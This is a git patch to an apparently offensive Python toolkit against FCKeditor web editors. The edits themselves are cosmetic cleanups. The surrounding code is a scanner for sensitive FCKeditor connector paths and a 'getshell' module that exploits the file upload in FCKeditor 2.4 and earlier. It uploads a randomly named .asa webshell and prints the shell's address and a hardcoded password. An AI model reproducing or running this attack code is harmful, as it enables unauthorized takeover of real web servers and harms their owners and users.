From fd5df5c621520eaf841427ad30670f7cb18bc080 Mon Sep 17 00:00:00 2001 From: rpkr <13591644403@139.com> Date: Tue, 20 Aug 2019 19:09:10 +0800 Subject: [PATCH] fix --- fckeditor/Main_fckeditor.py | 3 --- fckeditor/fckeditor_dangerfile.py | 16 ++++++---------- fckeditor/fckeditor_getshell.py | 14 ++++++++------ 3 files changed, 14 insertions(+), 19 deletions(-) diff --git a/fckeditor/Main_fckeditor.py b/fckeditor/Main_fckeditor.py index 0d74291..94fcc1f 100644 --- a/fckeditor/Main_fckeditor.py +++ b/fckeditor/Main_fckeditor.py @@ -1,5 +1,4 @@ # -*- coding: utf-8 -*- -import os import fckeditor.fckeditor_version import fckeditor.fckeditor_dangerfile import fckeditor.fckeditor_getshell @@ -11,7 +10,5 @@ def exec(URL): fckeditor.fckeditor_getshell.attack(URL) - - if __name__ == "__main__": exec() diff --git a/fckeditor/fckeditor_dangerfile.py b/fckeditor/fckeditor_dangerfile.py index 5fad96e..97e8112 100644 --- a/fckeditor/fckeditor_dangerfile.py +++ b/fckeditor/fckeditor_dangerfile.py @@ -1,14 +1,12 @@ # -*- coding: utf-8 -*- -import sys import requests -import time ''' Usage: moon.py -u fck http://127.0.0.1:8080 - ''' + def attack(URL): urls = ( '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', @@ -40,23 +38,21 @@ def attack(URL): ) print('[+]开始检测-Fckeditor敏感目录。[+]') - user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" - headers={"User-Agent":user_agent} + user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" + headers = {"User-Agent":user_agent} for url in urls: url = URL + url try: verify_response = requests.get(url, headers=headers) - if verify_response.status_code == 200: print('存在此页面:'+url) - else : + else: continue - except : + except Exception: print("Someerror!") print('[+]检测结束-Fckeditor敏感目录。[+]') print('\n') + if __name__ == "__main__": attack() - - diff --git a/fckeditor/fckeditor_getshell.py b/fckeditor/fckeditor_getshell.py index f9c0cd4..61ca5aa 100644 --- a/fckeditor/fckeditor_getshell.py +++ b/fckeditor/fckeditor_getshell.py @@ -14,9 +14,9 @@ Usage: 实际测试过程中还是上传asa可以,以下脚本也基于asa上传 fck编辑器如要上传文件需配置相关项目,如果出现上传成功且获取上传路径失败,就可能是配置不允许上传。 返回包出现这类文字基本上就是设置不允许上传:This connector is disabled. Please check the - ''' + def gen_shell(): min_char = 4 max_char = 12 @@ -24,6 +24,7 @@ def gen_shell(): shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) return shell_name + def geturl(URL): user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" headers={"User-Agent":user_agent} @@ -42,9 +43,10 @@ def geturl(URL): print("此Fckeditor上传路径为:" + soup.group(1)) return soup.group(1) break - except: + except Exception: pass + def attack(URL): print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]') url = URL + '/editor/filemanager/browser/default/connectors/test.html' @@ -68,12 +70,12 @@ def attack(URL): try: aim_url = geturl(URL) URL = re.match('http://(.*?)/',URL).group() - print('Shell地址为:'+URL+ aim_url+shellname+'.asa') + print('Shell地址为:'+URL + aim_url+shellname+'.asa') print('shell密码为:gutf987y97y97。') - except: + except Exception: print('获取上传路径失败,shell名为:'+shellname+'.asa') print('shell密码为:gutf987y97y97。') - except: + except Exception: print('上传shell发生错误。') else: print('未发现该页面:'+url) @@ -82,4 +84,4 @@ def attack(URL): if __name__ == "__main__": - attack() \ No newline at end of file + attack()